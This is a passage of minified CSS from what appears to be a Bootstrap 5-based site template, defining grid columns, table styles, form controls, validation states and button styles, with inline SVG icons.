auto;width:50%}.col-xl-7{flex:0 0 auto;width:58.33333333%}.col-xl-8{flex:0 0 auto;width:66.66666667%}.col-xl-9{flex:0 0 auto;width:75%}.col-xl-10{flex:0 0 auto;width:83.33333333%}.col-xl-11{flex:0 0 auto;width:91.66666667%}.col-xl-12{flex:0 0 auto;width:100%}.offset-xl-0{margin-left:0}.offset-xl-1{margin-left:8.33333333%}.offset-xl-2{margin-left:16.66666667%}.offset-xl-3{margin-left:25%}.offset-xl-4{margin-left:33.33333333%}.offset-xl-5{margin-left:41.66666667%}.offset-xl-6{margin-left:50%}.offset-xl-7{margin-left:58.33333333%}.offset-xl-8{margin-left:66.66666667%}.offset-xl-9{margin-left:75%}.offset-xl-10{margin-left:83.33333333%}.offset-xl-11{margin-left:91.66666667%}.g-xl-0,.gx-xl-0{--gutter-x:0}.g-xl-0,.gy-xl-0{--gutter-y:0}.g-xl-1,.gx-xl-1{--gutter-x:0.25rem}.g-xl-1,.gy-xl-1{--gutter-y:0.25rem}.g-xl-2,.gx-xl-2{--gutter-x:0.5rem}.g-xl-2,.gy-xl-2{--gutter-y:0.5rem}.g-xl-3,.gx-xl-3{--gutter-x:1rem}.g-xl-3,.gy-xl-3{--gutter-y:1rem}.g-xl-4,.gx-xl-4{--gutter-x:1.5rem}.g-xl-4,.gy-xl-4{--gutter-y:1.5rem}.g-xl-5,.gx-xl-5{--gutter-x:3rem}.g-xl-5,.gy-xl-5{--gutter-y:3rem}}@media (min-width:1400px){.col-xxl-auto{flex:0 0 auto;width:auto}.col-xxl-1{flex:0 0 auto;width:8.33333333%}.col-xxl-2{flex:0 0 auto;width:16.66666667%}.col-xxl-3{flex:0 0 auto;width:25%}.col-xxl-4{flex:0 0 auto;width:33.33333333%}.col-xxl-5{flex:0 0 auto;width:41.66666667%}.col-xxl-6{flex:0 0 auto;width:50%}.col-xxl-7{flex:0 0 auto;width:58.33333333%}.col-xxl-8{flex:0 0 auto;width:66.66666667%}.col-xxl-9{flex:0 0 auto;width:75%}.col-xxl-10{flex:0 0 auto;width:83.33333333%}.col-xxl-11{flex:0 0 auto;width:91.66666667%}.col-xxl-12{flex:0 0 auto;width:100%}.offset-xxl-0{margin-left:0}.offset-xxl-1{margin-left:8.33333333%}.offset-xxl-2{margin-left:16.66666667%}.offset-xxl-3{margin-left:25%}.offset-xxl-4{margin-left:33.33333333%}.offset-xxl-5{margin-left:41.66666667%}.offset-xxl-6{margin-left:50%}.offset-xxl-7{margin-left:58.33333333%}.offset-xxl-8{margin-left:66.66666667%}.offset-xxl-9{margin-left:75%}.offset-xxl-10{margin-left:83.33333333%}.offset-xxl-11{margin-left:91.66666667%}.g-xxl-0,.gx-xxl-0{--gutter-x:0}.g-xxl-0,.gy-xxl-0{--gutter-y:0}.g-xxl-1,.gx-xxl-1{--gutter-x:0.25rem}.g-xxl-1,.gy-xxl-1{--gutter-y:0.25rem}.g-xxl-2,.gx-xxl-2{--gutter-x:0.5rem}.g-xxl-2,.gy-xxl-2{--gutter-y:0.5rem}.g-xxl-3,.gx-xxl-3{--gutter-x:1rem}.g-xxl-3,.gy-xxl-3{--gutter-y:1rem}.g-xxl-4,.gx-xxl-4{--gutter-x:1.5rem}.g-xxl-4,.gy-xxl-4{--gutter-y:1.5rem}.g-xxl-5,.gx-xxl-5{--gutter-x:3rem}.g-xxl-5,.gy-xxl-5{--gutter-y:3rem}}.table{--table-bg:var(--white);--table-accent-bg:transparent;--table-striped-color:var(--template-text-dark);--table-striped-bg:rgba(0,0,0,0.05);--table-active-color:var(--template-text-dark);--table-active-bg:rgba(0,0,0,0.1);--table-hover-color:var(--template-text-dark);--table-hover-bg:rgba(0,0,0,0.075);width:100%;margin-bottom:1rem;color:var(--template-text-dark);vertical-align:top;border-color:#dee2e6}.table>:not(caption)>*>*{padding:.75rem 1rem;background-color:var(--table-bg);border-bottom-width:1px;box-shadow:inset 0 0 0 9999px var(--table-accent-bg)}.table>tbody{vertical-align:inherit}.table>thead{vertical-align:bottom}.table>:not(:last-child)>:last-child>*{border-bottom-color:#dee2e6}.caption-top{caption-side:top}.table-sm>:not(caption)>*>*{padding:.3rem}.table-bordered>:not(caption)>*{border-width:1px 0}.table-bordered>:not(caption)>*>*{border-width:0 1px}.table-borderless>:not(caption)>*>*{border-bottom-width:0}.table-striped>tbody>tr:nth-of-type(odd){--table-accent-bg:var(--table-striped-bg);color:var(--table-striped-color)}.table-active{--table-accent-bg:var(--table-active-bg);color:var(--table-active-color)}.table-hover>tbody>tr:hover{--table-accent-bg:var(--table-hover-bg);color:var(--table-hover-color)}.table-primary{--table-bg:#d4e1f1;--table-striped-bg:#c9d6e5;--table-striped-color:#000;--table-active-bg:#bfcbd9;--table-active-color:#000;--table-hover-bg:#c4d0df;--table-hover-color:#000;color:#000;border-color:#bfcbd9}.table-secondary{--table-bg:#e0e2e4;--table-striped-bg:#d5d7d9;--table-striped-color:#000;--table-active-bg:#cacbcd;--table-active-color:#000;--table-hover-bg:#cfd1d3;--table-hover-color:#000;color:#000;border-color:#cacbcd}.table-success{--table-bg:#dae5dd;--table-striped-bg:#cfdad2;--table-striped-color:#000;--table-active-bg:#c4cec7;--table-active-color:#000;--table-hover-bg:#cad4cc;--table-hover-color:#000;color:#000;border-color:#c4cec7}.table-info{--table-bg:#d4e1f1;--table-striped-bg:#c9d6e5;--table-striped-color:#000;--table-active-bg:#bfcbd9;--table-active-color:#000;--table-hover-bg:#c4d0df;--table-hover-color:#000;color:#000;border-color:#bfcbd9}.table-warning{--table-bg:#fff0d0;--table-striped-bg:#f2e4c6;--table-striped-color:#000;--table-active-bg:#e6d8bb;--table-active-color:#000;--table-hover-bg:#ecdec0;--table-hover-color:#000;color:#000;border-color:#e6d8bb}.table-danger{--table-bg:#f3d4d4;--table-striped-bg:#e7c9c9;--table-striped-color:#000;--table-active-bg:#dbbfbf;--table-active-color:#000;--table-hover-bg:#e1c4c4;--table-hover-color:#000;color:#000;border-color:#dbbfbf}.table-light{--table-bg:#f8f9fa;--table-striped-bg:#ecedee;--table-striped-color:#000;--table-active-bg:#dfe0e1;--table-active-color:#000;--table-hover-bg:#e5e6e7;--table-hover-color:#000;color:#000;border-color:#dfe0e1}.table-dark{--table-bg:#212529;--table-striped-bg:#2c3034;--table-striped-color:#fff;--table-active-bg:#373b3e;--table-active-color:#fff;--table-hover-bg:#323539;--table-hover-color:#fff;color:#fff;border-color:#373b3e}.table-responsive{overflow-x:auto;-webkit-overflow-scrolling:touch}@media (max-width:575.98px){.table-responsive-sm{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:767.98px){.table-responsive-md{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:991.98px){.table-responsive-lg{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:1199.98px){.table-responsive-xl{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:1399.98px){.table-responsive-xxl{overflow-x:auto;-webkit-overflow-scrolling:touch}}.form-label{margin-bottom:.5rem}.col-form-label{margin-bottom:0;font-size:inherit;line-height:1.5}.col-form-label,.col-form-label-lg{padding-top:calc(.5rem + 1px);padding-bottom:calc(.5rem + 1px)}.col-form-label-lg{font-size:1.25rem}.col-form-label-sm{padding-top:calc(.25rem + 1px);padding-bottom:calc(.25rem + 1px);font-size:.8rem}.form-text{margin-top:.25rem;font-size:.875em;color:#666e76}.form-control{display:block;width:100%;padding:.5rem 1rem;font-size:1rem;font-weight:400;line-height:1.5;color:var(--template-text-dark);background-clip:padding-box;border:1px solid #cdcdcd;-webkit-appearance:none;-moz-appearance:none;appearance:none;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control{transition:none}}.form-control[type=file]{overflow:hidden}.form-control[type=file]:not(:disabled):not([readonly]){cursor:pointer}.form-control:focus{color:var(--template-text-dark);background-color:#fff;border-color:#95b4db;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.form-control::-webkit-date-and-time-value{height:1.5em}.form-control::-webkit-input-placeholder{color:#666e76;opacity:1}.form-control::-moz-placeholder{color:#666e76;opacity:1}.form-control:-ms-input-placeholder{color:#666e76;opacity:1}.form-control::-ms-input-placeholder{color:#666e76;opacity:1}.form-control::placeholder{color:#666e76;opacity:1}.form-control:disabled,.form-control[readonly]{background-color:#e8e8e8;opacity:1}.form-control::file-selector-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem;color:var(--white);background-color:#132f53;pointer-events:none;border:0 solid;border-color:inherit;border-inline-end-width:1px;border-radius:0;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control::file-selector-button{transition:none}}.form-control:hover:not(:disabled):not([readonly])::file-selector-button{background-color:#122d4f}.form-control::-webkit-file-upload-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem;color:var(--white);background-color:#132f53;pointer-events:none;border:0 solid;border-color:inherit;border-inline-end-width:1px;border-radius:0;-webkit-transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control::-webkit-file-upload-button{-webkit-transition:none;transition:none}}.form-control:hover:not(:disabled):not([readonly])::-webkit-file-upload-button{background-color:#122d4f}.form-control-plaintext{display:block;width:100%;padding:.5rem 0;margin-bottom:0;line-height:1.5;color:var(--template-text-dark);background-color:transparent;border:solid transparent;border-width:1px 0}.form-control-plaintext.form-control-lg,.form-control-plaintext.form-control-sm{padding-right:0;padding-left:0}.form-control-sm{min-height:calc(1.5em + .5rem + 2px);padding:.25rem .5rem;font-size:.8rem;border-radius:.2rem}.form-control-sm::file-selector-button{padding:.25rem .5rem;margin:-.25rem -.5rem;-webkit-margin-end:.5rem;margin-inline-end:.5rem}.form-control-sm::-webkit-file-upload-button{padding:.25rem .5rem;margin:-.25rem -.5rem;-webkit-margin-end:.5rem;margin-inline-end:.5rem}.form-control-lg{min-height:calc(1.5em + 1rem + 2px);padding:.5rem 1rem;font-size:1.25rem;border-radius:.3rem}.form-control-lg::file-selector-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem}.form-control-lg::-webkit-file-upload-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem}textarea.form-control{min-height:calc(1.5em + 1rem + 2px)}textarea.form-control-sm{min-height:calc(1.5em + .5rem + 2px)}textarea.form-control-lg{min-height:calc(1.5em + 1rem + 2px)}.form-control-color{max-width:3rem;height:auto;padding:.5rem}.form-control-color:not(:disabled):not([readonly]){cursor:pointer}.form-control-color::-moz-color-swatch{height:1.5em;border-radius:.25rem}.form-control-color::-webkit-color-swatch{height:1.5em;border-radius:.25rem}.custom-select,.form-select{display:block;width:100%;padding:.5rem 3rem .5rem 1rem;-moz-padding-start:calc(1rem - 3px);font-size:1rem;font-weight:400;line-height:1.5;color:var(--template-text-dark);background-image:url(../images/select-bg.svg);background-repeat:no-repeat;background-position:right 1rem center;background-size:116rem;border:1px solid #cdcdcd;border-radius:.25rem;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out;-webkit-appearance:none;-moz-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.custom-select,.form-select{transition:none}}.custom-select:focus,.form-select:focus{border-color:#95b4db;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.form-select[multiple],.form-select[size]:not([size="1"]),[multiple].custom-select,[size].custom-select:not([size="1"]){padding-right:1rem;background-image:none}.custom-select:disabled,.form-select:disabled{background-color:#e8e8e8}.custom-select:-moz-focusring,.form-select:-moz-focusring{color:transparent;text-shadow:0 0 0 var(--template-text-dark)}.form-select-sm{padding-top:.25rem;padding-bottom:.25rem;padding-left:.5rem;font-size:.8rem}.form-select-lg{padding-top:.5rem;padding-bottom:.5rem;padding-left:1rem;font-size:1.25rem}.form-check{display:block;min-height:1.5rem;padding-left:1.5em;margin-bottom:.125rem}.form-check .form-check-input{float:left;margin-left:-1.5em}.form-check-input{width:1em;height:1em;margin-top:.25em;vertical-align:top;background-color:#fff;background-repeat:no-repeat;background-position:50%;background-size:contain;border:1px solid rgba(0,0,0,.25);-webkit-appearance:none;-moz-appearance:none;appearance:none;-webkit-print-color-adjust:exact;color-adjust:exact}.form-check-input[type=checkbox]{border-radius:.25em}.form-check-input[type=radio]{border-radius:50%}.form-check-input:active{-webkit-filter:brightness(90%);filter:brightness(90%)}.form-check-input:focus{border-color:#95b4db;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.form-check-input:checked{background-color:#2a69b7;border-color:#2a69b7}.form-check-input:checked[type=checkbox]{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10l3 3 6-6'/%3E%3C/svg%3E")}.form-check-input:checked[type=radio]{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='2' fill='%23fff'/%3E%3C/svg%3E")}.form-check-input[type=checkbox]:indeterminate{background-color:#2a69b7;border-color:#2a69b7;background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10h8'/%3E%3C/svg%3E")}.form-check-input:disabled{pointer-events:none;-webkit-filter:none;filter:none;opacity:.5}.form-check-input:disabled~.form-check-label,.form-check-input[disabled]~.form-check-label{opacity:.5}.form-switch{padding-left:2.5em}.form-switch .form-check-input{width:2em;margin-left:-2.5em;background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='rgba(0, 0, 0, 0.25)'/%3E%3C/svg%3E");background-position:0;border-radius:2em;transition:background-position .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-switch .form-check-input{transition:none}}.form-switch .form-check-input:focus{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%2395b4db'/%3E%3C/svg%3E")}.form-switch .form-check-input:checked{background-position:100%;background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E")}.form-check-inline{display:inline-block;margin-right:1rem}.btn-check{position:absolute;clip:rect(0,0,0,0);pointer-events:none}.btn-check:disabled+.btn,.btn-check[disabled]+.btn{pointer-events:none;-webkit-filter:none;filter:none;opacity:.4}.form-range{width:100%;height:1.5rem;padding:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;appearance:none}.form-range:focus{outline:0}.form-range:focus::-webkit-slider-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .25rem rgba(42,105,183,.25)}.form-range:focus::-moz-range-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .25rem rgba(42,105,183,.25)}.form-range::-moz-focus-outer{border:0}.form-range::-webkit-slider-thumb{width:1rem;height:1rem;margin-top:-.25rem;background-color:#2a69b7;border:0;border-radius:1rem;-webkit-transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;-webkit-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.form-range::-webkit-slider-thumb{-webkit-transition:none;transition:none}}.form-range::-webkit-slider-thumb:active{background-color:#bfd2e9}.form-range::-webkit-slider-runnable-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.form-range::-moz-range-thumb{width:1rem;height:1rem;background-color:#2a69b7;border:0;border-radius:1rem;-moz-transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;-moz-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.form-range::-moz-range-thumb{-moz-transition:none;transition:none}}.form-range::-moz-range-thumb:active{background-color:#bfd2e9}.form-range::-moz-range-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.form-range:disabled{pointer-events:none}.form-range:disabled::-webkit-slider-thumb{background-color:#adb5bd}.form-range:disabled::-moz-range-thumb{background-color:#adb5bd}.form-floating{position:relative}.form-floating>.custom-select,.form-floating>.form-control,.form-floating>.form-select{height:calc(3.5rem + 2px);line-height:1.25}.form-floating>label{position:absolute;top:0;left:0;height:100%;padding:1rem;pointer-events:none;border:1px solid transparent;-webkit-transform-origin:0 0;transform-origin:0 0;transition:opacity .1s ease-in-out,-webkit-transform .1s ease-in-out;transition:opacity .1s ease-in-out,transform .1s ease-in-out;transition:opacity .1s ease-in-out,transform .1s ease-in-out,-webkit-transform .1s ease-in-out}@media (prefers-reduced-motion:reduce){.form-floating>label{transition:none}}.form-floating>.form-control{padding:1rem}.form-floating>.form-control::-webkit-input-placeholder{color:transparent}.form-floating>.form-control::-moz-placeholder{color:transparent}.form-floating>.form-control:-ms-input-placeholder{color:transparent}.form-floating>.form-control::-ms-input-placeholder{color:transparent}.form-floating>.form-control::placeholder{color:transparent}.form-floating>.form-control:not(:-moz-placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:not(:-ms-input-placeholder){padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:focus,.form-floating>.form-control:not(:placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:-webkit-autofill{padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.custom-select,.form-floating>.form-select{padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:not(:-moz-placeholder-shown)~label{opacity:.65;transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.form-control:not(:-ms-input-placeholder)~label{opacity:.65;transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.custom-select~label,.form-floating>.form-control:focus~label,.form-floating>.form-control:not(:placeholder-shown)~label,.form-floating>.form-select~label{opacity:.65;-webkit-transform:scale(.85) translateY(-.5rem) translateX(.15rem);transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.form-control:-webkit-autofill~label{opacity:.65;-webkit-transform:scale(.85) translateY(-.5rem) translateX(.15rem);transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.input-group{position:relative;display:flex;flex-wrap:wrap;align-items:stretch;width:100%}.input-group>.custom-select,.input-group>.form-control,.input-group>.form-select{position:relative;flex:1 1 auto;width:1%;min-width:0}.input-group>.custom-select:focus,.input-group>.form-control:focus,.input-group>.form-select:focus{z-index:3}.input-group .btn{position:relative;z-index:2}.input-group .btn:focus{z-index:3}.input-group-text{display:flex;align-items:center;padding:.5rem 1rem;font-size:1rem;font-weight:400;line-height:1.5;color:var(--white);text-align:center;white-space:nowrap;background-color:#132f53;border:1px solid var(--template-bg-dark);border-radius:.25rem}.input-group-lg>.btn,.input-group-lg>.custom-select,.input-group-lg>.form-control,.input-group-lg>.form-select,.input-group-lg>.input-group-text{padding:.5rem 1rem;font-size:1.25rem;border-radius:.3rem}.input-group-sm>.btn,.input-group-sm>.custom-select,.input-group-sm>.form-control,.input-group-sm>.form-select,.input-group-sm>.input-group-text{padding:.25rem .5rem;font-size:.8rem;border-radius:.2rem}.input-group-lg>.custom-select,.input-group-lg>.form-select,.input-group-sm>.custom-select,.input-group-sm>.form-select{padding-right:4rem}.input-group.has-validation>.dropdown-toggle:nth-last-child(n+4),.input-group.has-validation>:nth-last-child(n+3):not(.dropdown-toggle):not(.dropdown-menu),.input-group:not(.has-validation)>.dropdown-toggle:nth-last-child(n+3),.input-group:not(.has-validation)>:not(:last-child):not(.dropdown-toggle):not(.dropdown-menu){border-top-right-radius:0;border-bottom-right-radius:0}.input-group>:not(:first-child):not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback){margin-left:-1px;border-top-left-radius:0;border-bottom-left-radius:0}.valid-feedback{display:none;width:100%;margin-top:.25rem;font-size:.875em;color:#457d54}.valid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.8rem;color:#fff;background-color:rgba(69,125,84,.9);border-radius:.25rem}.is-valid~.valid-feedback,.is-valid~.valid-tooltip,.was-validated :valid~.valid-feedback,.was-validated :valid~.valid-tooltip{display:block}.form-control.is-valid,.was-validated .form-control:valid{border-color:#457d54;padding-right:calc(1.5em + 1rem);background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23457d54' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3E%3C/svg%3E");background-repeat:no-repeat;background-position:right calc(.375em + .25rem) center;background-size:calc(.75em + .5rem) calc(.75em + .5rem)}.form-control.is-valid:focus,.was-validated .form-control:valid:focus{border-color:#457d54;box-shadow:0 0 0 .25rem rgba(69,125,84,.25)}.was-validated textarea.form-control:valid,textarea.form-control.is-valid{padding-right:calc(1.5em + 1rem);background-position:top calc(.375em + .25rem) right calc(.375em + .25rem)}.form-select.is-valid,.is-valid.custom-select,.was-validated .custom-select:valid,.was-validated .form-select:valid{border-color:#457d54}.form-select.is-valid:not([multiple]):not([size]),.form-select.is-valid:not([multiple])[size="1"],.is-valid.custom-select:not([multiple]):not([size]),.is-valid.custom-select:not([multiple])[size="1"],.was-validated .custom-select:valid:not([multiple]):not([size]),.was-validated .custom-select:valid:not([multiple])[size="1"],.was-validated .form-select:valid:not([multiple]):not([size]),.was-validated .form-select:valid:not([multiple])[size="1"]{padding-right:5.5rem;background-image:url(../images/select-bg.svg),url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23457d54' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3E%3C/svg%3E");background-position:right 1rem center,center right 3rem;background-size:116rem,calc(.75em + .5rem) calc(.75em + .5rem)}.form-select.is-valid:focus,.is-valid.custom-select:focus,.was-validated .custom-select:valid:focus,.was-validated .form-select:valid:focus{border-color:#457d54;box-shadow:0 0 0 .25rem rgba(69,125,84,.25)}.form-check-input.is-valid,.was-validated .form-check-input:valid{border-color:#457d54}.form-check-input.is-valid:checked,.was-validated .form-check-input:valid:checked{background-color:#457d54}.form-check-input.is-valid:focus,.was-validated .form-check-input:valid:focus{box-shadow:0 0 0 .25rem rgba(69,125,84,.25)}.form-check-input.is-valid~.form-check-label,.was-validated .form-check-input:valid~.form-check-label{color:#457d54}.form-check-inline .form-check-input~.valid-feedback{margin-left:.5em}.input-group .form-control.is-valid,.input-group .form-select.is-valid,.input-group .is-valid.custom-select,.was-validated .input-group .custom-select:valid,.was-validated .input-group .form-control:valid,.was-validated .input-group .form-select:valid{z-index:1}.input-group .form-control.is-valid:focus,.input-group .form-select.is-valid:focus,.input-group .is-valid.custom-select:focus,.was-validated .input-group .custom-select:valid:focus,.was-validated .input-group .form-control:valid:focus,.was-validated .input-group .form-select:valid:focus{z-index:3}.invalid-feedback{display:none;width:100%;margin-top:.25rem;font-size:.875em;color:#c52827}.invalid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.8rem;color:#fff;background-color:rgba(197,40,39,.9);border-radius:.25rem}.is-invalid~.invalid-feedback,.is-invalid~.invalid-tooltip,.was-validated :invalid~.invalid-feedback,.was-validated :invalid~.invalid-tooltip{display:block}.form-control.is-invalid,.was-validated .form-control:invalid{border-color:#c52827;padding-right:calc(1.5em + 1rem);background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23c52827'%3E%3Ccircle cx='6' cy='6' r='4.5'/%3E%3Cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3E%3Ccircle cx='6' cy='8.2' r='.6' fill='%23c52827' stroke='none'/%3E%3C/svg%3E");background-repeat:no-repeat;background-position:right calc(.375em + .25rem) center;background-size:calc(.75em + .5rem) calc(.75em + .5rem)}.form-control.is-invalid:focus,.was-validated .form-control:invalid:focus{border-color:#c52827;box-shadow:0 0 0 .25rem rgba(197,40,39,.25)}.was-validated textarea.form-control:invalid,textarea.form-control.is-invalid{padding-right:calc(1.5em + 1rem);background-position:top calc(.375em + .25rem) right calc(.375em + .25rem)}.form-select.is-invalid,.is-invalid.custom-select,.was-validated .custom-select:invalid,.was-validated .form-select:invalid{border-color:#c52827}.form-select.is-invalid:not([multiple]):not([size]),.form-select.is-invalid:not([multiple])[size="1"],.is-invalid.custom-select:not([multiple]):not([size]),.is-invalid.custom-select:not([multiple])[size="1"],.was-validated .custom-select:invalid:not([multiple]):not([size]),.was-validated .custom-select:invalid:not([multiple])[size="1"],.was-validated .form-select:invalid:not([multiple]):not([size]),.was-validated .form-select:invalid:not([multiple])[size="1"]{padding-right:5.5rem;background-image:url(../images/select-bg.svg),url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23c52827'%3E%3Ccircle cx='6' cy='6' r='4.5'/%3E%3Cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3E%3Ccircle cx='6' cy='8.2' r='.6' fill='%23c52827' stroke='none'/%3E%3C/svg%3E");background-position:right 1rem center,center right 3rem;background-size:116rem,calc(.75em + .5rem) calc(.75em + .5rem)}.form-select.is-invalid:focus,.is-invalid.custom-select:focus,.was-validated .custom-select:invalid:focus,.was-validated .form-select:invalid:focus{border-color:#c52827;box-shadow:0 0 0 .25rem rgba(197,40,39,.25)}.form-check-input.is-invalid,.was-validated .form-check-input:invalid{border-color:#c52827}.form-check-input.is-invalid:checked,.was-validated .form-check-input:invalid:checked{background-color:#c52827}.form-check-input.is-invalid:focus,.was-validated .form-check-input:invalid:focus{box-shadow:0 0 0 .25rem rgba(197,40,39,.25)}.form-check-input.is-invalid~.form-check-label,.was-validated .form-check-input:invalid~.form-check-label{color:#c52827}.form-check-inline .form-check-input~.invalid-feedback{margin-left:.5em}.input-group .form-control.is-invalid,.input-group .form-select.is-invalid,.input-group .is-invalid.custom-select,.was-validated .input-group .custom-select:invalid,.was-validated .input-group .form-control:invalid,.was-validated .input-group .form-select:invalid{z-index:2}.input-group .form-control.is-invalid:focus,.input-group .form-select.is-invalid:focus,.input-group .is-invalid.custom-select:focus,.was-validated .input-group .custom-select:invalid:focus,.was-validated .input-group .form-control:invalid:focus,.was-validated .input-group .form-select:invalid:focus{z-index:3}.btn{display:inline-block;font-weight:400;line-height:1.5;color:var(--template-text-dark);text-align:center;vertical-align:middle;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background-color:transparent;border:1px solid transparent;padding:.5rem 1rem;font-size:1rem;border-radius:.25rem;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.btn{transition:none}}.btn:hover{color:var(--template-text-dark)}.btn-check:focus+.btn,.btn:focus{outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.btn.disabled,.btn:disabled,fieldset:disabled .btn{pointer-events:none;opacity:.4}.btn-primary{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:focus+.btn-primary,.btn-primary:focus,.btn-primary:hover{color:#fff;background-color:#102847;border-color:#0f2642}.btn-check:focus+.btn-primary,.btn-primary:focus{box-shadow:0 0 0 .25rem rgba(54,78,109,.5)}.btn-check:active+.btn-primary,.btn-check:checked+.btn-primary,.btn-primary.active,.btn-primary:active,.show>.btn-primary.dropdown-toggle{color:#fff;background-color:#0f2642;border-color:#0e233e}.btn-check:active+.btn-primary:focus,.btn-check:checked+.btn-primary:focus,.btn-primary.active:focus,.btn-primary:active:focus,.show>.btn-primary.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(54,78,109,.5)}.btn-primary.disabled,.btn-primary:disabled{color:#fff;background-color:#132f53;border-color:#132f53}.btn-secondary{color:#fff;background-color:#495057;border-color:#495057}.btn-check:focus+.btn-secondary,.btn-secondary:focus,.btn-secondary:hover{color:#fff;background-color:#3e444a;border-color:#3a4046}.btn-check:focus+.btn-secondary,.btn-secondary:focus{box-shadow:0 0 0 .25rem 